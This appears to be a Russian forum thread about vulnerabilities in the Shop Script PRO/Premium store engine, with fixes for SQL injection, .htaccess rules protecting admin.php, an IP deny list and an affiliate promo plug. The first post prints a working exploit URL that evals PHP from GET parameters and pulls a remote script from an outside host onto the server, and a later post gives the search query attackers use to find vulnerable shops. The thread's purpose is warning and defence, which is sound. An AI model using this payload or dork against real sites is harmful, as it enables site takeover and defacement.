Множественные уязвимости в Shop Script Premium, PRO

Пишем и обсуждаем программное обеспечение, обсуждаем компьютерное аппаратное обеспечение, работаем в сети Интернет.

Модератор: Spacesoft

Ответить
Аватара пользователя
Oleg
Site Admin
Сообщения: 529
Зарегистрирован: Чт мар 13, 2008 9:41 pm
Вaш интepнeт-πpoвaйдep: CLN.RU
Контактная информация:

Множественные уязвимости в Shop Script Premium, PRO

Сообщение Oleg »

Вот этот URL копирует злонамеренный скрипт temp.php прямо в корень Вашего сайта.

/index.php?hack=%24_GET%5Bhack2%5D%3Dstripcslashes%28%24_GET%5Bhack2%5D%29%3B+eval%28%24_GET%5Bhack2%5D%29%3B&hack2=copy%28%22http%3A%2F%2Fvideo-movie.com%2Ftemp%2Fc2007.txt%22%2C%22temp.php%22%29%3B

В адресной строке браузера этот же код выглядит так :

index.php?hack=%24_GET[hack2]%3Dstripcslashes(%24_GET[hack2])%3B+eval(%24_GET[hack2])%3B&hack2=copy("http%3A%2F%2Fvideo-movie.com%2Ftemp%2Fc2007.txt"%2C"temp.php")%3B

Пример уязвимого сайта : "b u b i s . r u" (удалить пробелы и кавычки). На этом сайте злонамеренный хакер, использовав уязвимость движка Shop Script PRO 2.0, "навешал" рекламных ссылок, причём на каждой странице сайта.

Есть мнение, что данная уязвимость есть только в нулёных (пиратских) версиях скрипта.
shop-script-premium.pdf
Shop-Script PREMIUM
Руководство Пользователя
Версия продукта: Shop-Script PREMIUM 1.24
(2.77 МБ) 10180 скачиваний
Житель района Восточное Дегунино (Москва, Россия)
Аватара пользователя
Oleg
Site Admin
Сообщения: 529
Зарегистрирован: Чт мар 13, 2008 9:41 pm
Вaш интepнeт-πpoвaйдep: CLN.RU
Контактная информация:

Советы по устранению уязвимостей

Сообщение Oleg »

http://forum.webasyst.ru/viewtopic.php?id=3069
по поводу защиты от sql-инъекций mihbel написал:
________________________________________________
Во всех запросах в тех местах где спрашивают числовое значение поставить (int), где строковое - mysql_real_escape_string.

Например вместо
Код:

$s = "SELECT categoryID, name FROM ".CATEGORIES_TABLE." WHERE categoryID<>0 and name LIKE '%".$search[0]."%' ";
будем писать
Код:

$s = "SELECT categoryID, name FROM ".CATEGORIES_TABLE." WHERE categoryID<>0 and name LIKE '%".mysql_real_escape_string($search[0])."%' ";
А вместо
Код:

$q = db_query("SELECT * FROM ".CATEGORIES_TABLE." WHERE parent='".$categoryID."'") or die (db_error());
напишем
Код:

$q = db_query("SELECT * FROM ".CATEGORIES_TABLE." WHERE parent='".(int)$categoryID."'") or die (db_error());
Житель района Восточное Дегунино (Москва, Россия)
Аватара пользователя
Oleg
Site Admin
Сообщения: 529
Зарегистрирован: Чт мар 13, 2008 9:41 pm
Вaш интepнeт-πpoвaйдep: CLN.RU
Контактная информация:

Альтернативная, бесплатная версия Shop Script

Сообщение Oleg »

Житель района Восточное Дегунино (Москва, Россия)
sibbear
Сообщения: 1
Зарегистрирован: Пн янв 25, 2010 11:50 am
Вaш интepнeт-πpoвaйдep: Stream

Re: Множественные уязвимости в Shop Script Premium

Сообщение sibbear »

Приятно конечно, что Lego уже пиарят во всю, но дайте ее закончить, там еще дыр хренова туча...
Но всеравно спасибо 8-)
Аватара пользователя
Oleg
Site Admin
Сообщения: 529
Зарегистрирован: Чт мар 13, 2008 9:41 pm
Вaш интepнeт-πpoвaйдep: CLN.RU
Контактная информация:

Re: Множественные уязвимости в Shop Script Premium

Сообщение Oleg »

sibbear писал(а):Приятно конечно, что Lego уже пиарят во всю, но дайте ее закончить, там еще дыр хренова туча...
Но всеравно спасибо 8-)
И Вам спасибо! :)

Когда доведёте сборку до логического конца, дайте знать :)
Житель района Восточное Дегунино (Москва, Россия)
Аватара пользователя
Oleg
Site Admin
Сообщения: 529
Зарегистрирован: Чт мар 13, 2008 9:41 pm
Вaш интepнeт-πpoвaйдep: CLN.RU
Контактная информация:

Закрываем доступ к админ-панели admin.php

Сообщение Oleg »

Закрываем доступ "лишним" людям к админ-панели admin.php.

В корень сайта кладём .htaccess со следующей информацией :

<Files "admin.php">
Order Deny,Allow
Deny from all
# Дача
Allow from novgorod.dslavangard.ru
# Дом
Allow from 95.71.
# Офис
Allow from 62.173.
</Files>

Полезная справка по .htaccess :

http://blog.sliderweb.ru/2009/01/htaccess-recepty/
http://www.goodnet.ru/forum/viewtopic.php?p=791
Житель района Восточное Дегунино (Москва, Россия)
Аватара пользователя
Oleg
Site Admin
Сообщения: 529
Зарегистрирован: Чт мар 13, 2008 9:41 pm
Вaш интepнeт-πpoвaйдep: CLN.RU
Контактная информация:

Купить лицензию недорого

Сообщение Oleg »

Купить лицензию недорого :
  1. На сайте http://www.webasyst.ru указать промо-код 226202 и оформить любую покупку со скидкой 5%
  2. Перейти по ссылке http://www.webasyst.ru/?affid=226202 и оформить любую покупку со скидкой 5%
Размещайте эту ссылку в любом месте в интернете (на своем сайте, на форуме, в блоге и т.д.), отправляйте по почте вашим партнерам и заказчикам. Человек, который зайдет по этой ссылке на сайт WebAsyst и сделает там покупку, получит 5% скидку.
Тот, кто купит любой продукт на сайте http://www.webasyst.ru с промо-кодом 226202 , имеет право на бесплатные консультации по устранению уязвимостей и по восстановлению полноценной работы сайта. Пишите прямо в эту тему.

http://www.nulled.ws/showthread.php?t=30687
http://mastertalk.ru/topic39276.html
Житель района Восточное Дегунино (Москва, Россия)
Аватара пользователя
Oleg
Site Admin
Сообщения: 529
Зарегистрирован: Чт мар 13, 2008 9:41 pm
Вaш интepнeт-πpoвaйдep: CLN.RU
Контактная информация:

Как хакеры ищут интернет-магазины на этом движке

Сообщение Oleg »

В поисковой системе Google набирают поисковую фразу :
интернет-магазин show_aux_page site:ru
Известные мне сайты были взломаны 11.11.2009.
Житель района Восточное Дегунино (Москва, Россия)
Аватара пользователя
Oleg
Site Admin
Сообщения: 529
Зарегистрирован: Чт мар 13, 2008 9:41 pm
Вaш интepнeт-πpoвaйдep: CLN.RU
Контактная информация:

Re: Закрываем доступ к админ-панели admin.php

Сообщение Oleg »

Oleg писал(а): Пн янв 25, 2010 12:06 pm Закрываем доступ "лишним" людям к админ-панели admin.php.

В корень сайта кладём .htaccess со следующей информацией :

<Files "admin.php">
Order Deny,Allow
Deny from all
# Дача
Allow from novgorod.dslavangard.ru
# Дом
Allow from 95.71.
# Офис
Allow from 62.173.
</Files>

Полезная справка по .htaccess :

http://blog.sliderweb.ru/2009/01/htaccess-recepty/
http://www.goodnet.ru/forum/viewtopic.php?p=791
Закрываем спам:

Код: Выделить всё

<Files "memberlist.php">
	Order Deny,Allow
	Deny from 45.154.255.0/24
	Deny from 46.182.106.0/24
	Deny from 46.232.248.0/22
	Deny from 51.0.0.0/8
	Deny from 54.80.0.0/12
	Deny from 54.72.0.0/13
	Deny from 62.109.8.0/21
	Deny from 77.192.0.0/12
	Deny from 87.98.128.0/17
	Deny from 89.31.56.0/21
	Deny from 91.250.242.0/24
	Deny from 104.244.72.0/21
	Deny from 109.70.100.0/24
	Deny from 144.91.64.0/18
	Deny from 145.239.0.0/16
	Deny from 149.202.0.0/16
	Deny from 150.129.8.0/22
	Deny from 162.247.72.0/22
	Deny from 171.25.193.0/24
	Deny from 176.10.96.0/19
	Deny from 178.17.160.0/20
	Deny from 178.32.96.0/19
	Deny from 179.43.128.0/18
	Deny from 185.38.175.0/24
	Deny from 185.100.87.0/24
	Deny from 185.213.155.0/24
	Deny from 185.220.100.0/22
	Deny from 185.232.52.0/24
	Deny from 198.251.80.0/20
	Deny from 199.249.230.0/24
	Deny from 212.47.224.0/19
	Deny from 217.182.0.0/16
</Files>
Житель района Восточное Дегунино (Москва, Россия)
Ответить

Вернуться в «Компьютерные вопросы. Интернет»